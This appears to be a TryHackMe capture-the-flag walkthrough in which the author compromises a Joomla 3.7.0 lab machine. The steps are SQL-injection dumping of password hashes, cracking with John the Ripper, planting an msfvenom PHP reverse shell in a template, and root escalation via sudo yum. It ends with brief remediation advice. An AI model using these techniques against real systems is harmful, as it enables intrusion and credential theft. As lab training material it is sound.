Before you start, ensure you’ve completed the Introduction to Metasploit lesson.
We’re going to hack into a vulnerable Linux machine using Metasploit. We’ll determine which vulnerabilities exist, run exploits, gain access, and become the root user.
Start Metasploit and ensure your database is up and running.
Then start this machine from TryHackMe.
Run the command “db_nmap -A -v <vulnerable_machine_ip>” and let the scan complete.
Check the open ports and services with the ‘services’ command. You’ll notice that Metasploit stored our work from the previous lesson.
Let’s start fresh by creating a new workspace.
Use this command:
workspace -a <name>
Now switch to it using the command:
workspace <name>
Run services again. You’ll see that it’s empty.
Since we created a new workspace, we need to re-run the Nmap scan on the vulnerable machine.
Run services when it’s finished. There are three open ports: ssh, http, and mysql.
Let’s start with port 22. Search Metasploit for vulnerabilities on that version of OpenSSH.
Nothing there. Move on to port 80.
First, visit the website. It’s a simple website with a login form.
Look back through the Nmap scan. There’s a path indicating that this is a Joomla website.
Let’s see if there are any vulnerabilities. First, try to find out the Joomla version so we can search for specific vulnerabilities.
Check out #14. Let’s use it!
It’s version 3.7.0. Tailor your exploit search for that specific version of Joomla.
Let’s use it and fill in the variables.
Now run the exploit.
No luck there. This is the reality of penetration testing- you may need to try several methods.
I searched Google and found this exploit. It will dump the user and session tables, which means we’ll get a username and password hash.
– Note: I had to restart the TryHackMe machine. The new IP address is 10.10.87.14.
Go to the exploit page. Click Code → Joomblah → joomblah.py. Then click “Raw.”
The URL in the browser will change. Copy it.
Run the command ‘wget <url>’ to download the exploit.
Now run the file. Run it using Python2 (you’ll get an error otherwise) and the vulnerable machine’s URL as an additional command. Like this:
Nice! We got the username and password hash.
Run the “hashid” command and paste the password hash. Hit the enter key again, and it will determine the hash type used.
It seems to be bcrypt. Save the hash in a file (I created a file called “hash_file” and pasted it in using vim.)
Now execute these commands:
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
john <hash_file_name> --wordlist=/usr/share/wordlists/rockyou.txt
The first command unzips a file (rockyou.txt.gz) that comes with Kali Linux. It’s a list of over 14 million plaintext passwords that are commonly used.
The second command uses John The Ripper to crack the password hash using rockyou.txt as a wordlist.
It may take several minutes to finish.
Nice work! The password is spiderman123. I could log into the website using this password and the username “jonah”.
Note: for this section, I used a virtual machine with a different IP address. The new address is 10.10.97.14.
Let’s upload a shell and attempt to get root access.
Here’s what I did to get to the control panel:
I also used Google for discovering how to upload a shell in Joomla. Follow along:
Head to Extensions → Templates → Templates
Click the second template:
Then click New File:
Let’s get a Metasploit php shell using Msfvenom.
Run this command:
msfvenom -p php/meterpreter/reverse_tcp LHOST=tun0 LPORT=1337 -o shell.php
Now upload the file.
That didn’t work. Let’s try the other method.
Click “Create” and navigate to the shell.php file. Paste the code from the shell you generated with Msfvenom into it, then click save.
Now set up the listener on Metasploit.
In your browser, enter this URL:
http://<machine-ip>/templates/protostar/<filename>.php
We get the Meterpreter shell!
Run the command “getuid”, and you’ll see we’re a low-privileged user. Let’s attempt some lateral movement.
That configuration file might glean something useful. Check it out:
I tried logging in as root with that password, but no luck there.
Let’s check the /home directory for available users.
There’s one: jjameson. Try to ssh as that user.
Note: My TryHackMe machine unexpectedly timed out, so I had to restart it. The new IP is 10.10.48.72.
It works! When asked for the password, I entered the one from the configuration file.
Let’s get root access. Try the “sudo -l” command. It shows a list of allowed and forbidden commands for the user.
As you can see, the user can run yum with sudo. Let’s see if we can manipulate this binary file to become the root user.
I like using GTFOBins for escalating privileges from binary files. You can search “yum” or click this link to access the code.
I tried option A, but it didn’t work for me. Try option B.
Run the command “whoami”. You’ll see that you’re the root user. Great work!
From here, you can change the password and get access from SSH. I recommend accessing from SSH because it is (usually) more functional than the earlier shell.
By “more functional,” I mean that SSH has a greater range of commands you can execute. It’s also easier to execute commands from SSH using keys you’re used to. In some shells, the syntax for executing commands is confusing- pressing a key like the up arrow can cause an unexpected problem.
Here’s another reason to access from SSH: you are initiating the connection to the victim machine. This is better than relying on a reverse shell- where the victim machine initiates an outbound connection back to you- since that connection can be unexpectedly closed.
Before we close, imagine you see this issue in your system. What should you do?
Firstly, ensure your system is up-to-date. Old vulnerabilities are often fixed in the latest version of a software. Change the passwords and perform an integrity check afterwards.
To eliminate the privilege escalation problem, you can run this command:
vi /etc/sudoers
Then put a “!” sign before the binary file. This informs the system that jjameson is not allowed to execute that binary.
You can also remove the sudo permissions from the jjameson user. This way, jjameson can’t execute commands normally reserved for the root user.
Thanks for reading!